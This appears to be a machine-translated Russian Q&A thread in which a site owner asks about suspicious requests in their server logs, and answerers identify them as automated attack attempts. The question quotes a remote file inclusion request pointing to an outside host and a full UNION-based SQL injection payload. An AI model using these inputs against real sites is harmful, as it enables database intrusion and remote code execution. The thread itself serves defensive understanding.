Это попытка инъекции или нормальный запрос? - PullRequest
2 голосов
/ 04 мая 2010

В модуле статистики cPanel Analog Stats я заметил бесчисленные запросы на подключение к следующему примеру:

/?x=19&y=15

Числа случайные, но всегда устанавливаются переменные x и y.

Еще одна категория загадочных запросов:

/?id=http://nic.bupt.edu.cn/media/j1.txt??

Существуют и другие попытки внедрения в журнале запросов, в которые также записан прямой SQL. Пример:

 /jobs/jobinfo.php?id=-999.9 UNION ALL SELECT 1,(SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM information_schema.tables WHERE table_schema=0x73636363726F6F745F7075626C6963),3,4,5,6,7,8,9,10,11,12,13--

Похоже, что они все достигают 404, но я все еще задаюсь вопросом о намерениях, стоящих за ними.

Я знаю, что это расплывчато, но, возможно, кто-то знает, что это нормально при использовании сервисов cPanel & phpMyAdmin. Кроме того, на сайте было установлено окно поиска, которое могло быть причиной.

Какие-нибудь предложения относительно того, что все это?


РЕДАКТИРОВАТЬ

Я вытащил все это из списков запросов и отрезал текст, на который они указывают. Возможно, это поможет лучше понять, что это за атаки.

http://www.diakonia-jkt.sch.id
http://www.nationalmedecine.com
http://muzykologia.lublin.pl
http://www.abi.co.uk
http://stul.netsolutions.cz
http://jack.tiscali.it
http://solid.go.ro
http://nic.bupt.edu.cn
http://www.europeanforumcyprus.eu
http://www.nationalmedecine.com

Кроме того, в разделе статуса phpMyAdmin отображается около 900 запросов на изменение в час. Может ли пользователь с только избранными привилегиями нанести реальный ущерб БД? На нем нет личной информации, но эти SOB засоряют пропускную способность.

Ответы [ 4 ]

5 голосов
/ 04 мая 2010

Это (кроме верхнего) автоматические (?) Попытки найти слабые места в коде;

/? ID = http://nic.bupt.edu.cn/media/j1.txt??

Пытается импортировать страницу PHP с другого сервера. Хорошо известная проблема, особенно со старым программным обеспечением PHP.

UNION ALL SELECT 1 - очевидная попытка вставки SQL. ID схемы 0x73636363726F6F745F7075626C6963 преобразуется в "scccroot_public". Я не уверен, для какой базы данных это. Но они пытаются взять это под контроль, это точно.

4 голосов
/ 04 мая 2010

x=19&y=15 выглядит так, как будто на вашем сайте есть форма с method=get и вводом type=image. Вы входите реферер?

3 голосов
/ 04 мая 2010

/?x=19&y=15 может представлять <input type="image" />

0 голосов
/ 04 мая 2010

/? Id = http://nic.bupt.edu.cn/media/j1.txt?? выглядит как нечто межсайтовое, бесполезное, потому что загружает простой текстовый файл O_O

...